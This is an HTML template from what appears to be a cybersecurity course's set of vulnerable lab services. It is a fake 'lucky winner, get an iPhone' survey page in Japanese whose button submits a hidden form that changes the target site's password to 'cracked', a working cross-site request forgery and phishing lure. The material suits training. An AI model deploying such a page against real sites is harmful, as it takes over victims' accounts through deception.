<!DOCTYPE html>
<html lang="ja">
<head>
    <meta charset="utf-8">
    <title>Fishing Campaign</title>
    <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" rel="stylesheet">
    <link href="https://use.fontawesome.com/releases/v5.6.1/css/all.css" rel="stylesheet">
</head>
<body class="text-center">
<header>
<div class="collapse bg-dark" id="navbarHeader">
    <div class="container">
    <div class="row">
        <div class="col-sm-8 col-md-7 py-4">
        <h4 class="text-white">About</h4>
        <p class="text-muted">This site is a collection of vulnerable web services created in a Cybersecurity course.</p>
        </div>
        <div class="col-sm-4 offset-md-1 py-4">
        <h4 class="text-white">Contact</h4>
        <ul class="list-unstyled">
            <li><a href="https://gitlab.com/b20-sec" class="text-white">Gitlab Group</a></li>
        </ul>
        <a class="text-white"href="/">TOP</a>
        </div>
    </div>
    </div>
</div>
<div class="navbar navbar-dark bg-dark shadow-sm">
    <div class="container d-flex justify-content-between">
    <a href="/" class="navbar-brand d-flex align-items-center">
        <i class='fas fa-shield-alt'></i>
        <strong>Fishing</strong>
    </a>
    <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarHeader" aria-controls="navbarHeader" aria-expanded="false" aria-label="Toggle navigation">
        <span class="navbar-toggler-icon"></span>
    </button>
    </div>
</div>
</header>
<main style="width: 1200px; max-width: 95%; margin-left:auto; margin-right: auto; left:0; right:0; margin-top:50px;">
<h1 class="mt-3 mb-3 text-left text-center">おめでとうございます！あなたは、幸運な当選者です！</h1>
<h2 class="mt-3 mb-1 text-left text-center">アンケートに答えて、iPhone 11 Pro をゲット！</h2>
<form action="http://<%- targetIP %>:<%- targetPort %>/changePW" method="POST" target="a">
    <input type="hidden" name="pw" value="cracked">
    <input type="hidden" name="pw2" value="cracked">
    <button id="click" style="background-color: #48f; border: solid 1px black; border-radius:4px; padding: 5px 10px; font-size: 30px; color: white; margin-top: 50px;">アンケートに回答する</button>
</form>
</main>
<script src="csrf.js"></script>
<script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
<script>
window.jQuery || document.write('<script src="/docs/4.3/assets/js/vendor/jquery-slim.min.js"><\/script>')
</script><script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.bundle.min.js"></script>
</body>
</html>